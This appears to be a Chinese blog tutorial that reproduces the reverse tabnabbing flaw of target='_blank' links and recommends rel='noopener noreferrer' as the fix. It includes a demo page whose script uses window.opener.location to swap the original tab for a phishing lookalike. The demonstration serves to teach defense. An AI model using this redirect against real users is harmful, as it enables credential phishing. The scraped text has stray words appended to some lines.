前几日,在看阮一峰老师的博客文章中,发现了这么一篇 。标题为 《target = "_blank" 的危险性(英文)》。这篇文章同事看过以后由于不理解其中的危险之处,念念不忘,因而这里咱们来重现一下这个漏洞。html
首先作点准备:chrome
正式开始浏览器
首先在a.com下 创建1.html 写入代码oop
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> </head> <body> <input type="text" value="信用卡+密码表单"> <a href="http://b.com/b.html" target="_blank" >B站</a> </body> </html>
在代码中,咱们创建了一个A标签,连接到B站点,地址为 http://b.com/b.html 打开方式为 新标签页打开 也就是target="_blank"网站
将这个1.html文件复制一份到b站点的目录中并修改代码为url
1 <!DOCTYPE html> 2 <html> 3 <head> 4 <meta charset="UTF-8"> 5 <meta name="viewport" content="width=device-width, initial-scale=1.0"> 6 7 </head> 8 <body> 9 <input type="text" value="信用卡+密码表单+钓鱼页面"> 10 <a href="http://b.com/b.html" target="_blank" >B站</a> 11 </body> 12 </html>
注意红色部分,这里是为了区分第一个页面加的标记。准备好之后再创建一个b.html知足A标签的目标文件。spa
代码为code
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script> function dosth(){ window.opener.location = "http://b.com/1.html"; alert("OK"); } </script> </head> <body> <p>B站</p> <button type="button" onclick="dosth();">js</button> </body> </html>
至此代码准备完毕,开始重现漏洞触发过程htm
打开Chrome ,当前版本为blog
输入a.com/1.html 访问
点击A标签 B站 此时弹出新页面
点击那个说大不大说小不小的JS按钮,执行一段神不知鬼不觉的JS
此时回去看上一个页面 已经神不知鬼不觉的变成了一个钓鱼页面
至此,整个漏洞利用的攻击过程结束。
那么只要有A标签的地方,而且使用了_blank的方式打开,那么都会有这个被钓鱼的风险。怎么避免风险呢,
若是你是一个普通用户,那么在输入敏感信息以前,必定必定必定要确认当前的url是否是正确的url,也就是防钓鱼的那一套。
若是你是一个开发者,那么请在你的网站上面,全部相似的A标签上加入属性 rel="noopener" 来防止这个漏洞被利用
可是这里要值得一提的是,noopener并非全部浏览器都支持的,它的支持程度以下图
无脑一点的方案就是 rel="nofollow noopener noreferrer" 这样来阻止。
到此本文最初的目的“最简单的实现一次这个漏洞攻击”已经达到了,还有一些细节没有补充,具体能够阅读原文
https://www.tutorialdocs.com/article/html-opener-blank.html 来了解更多详情。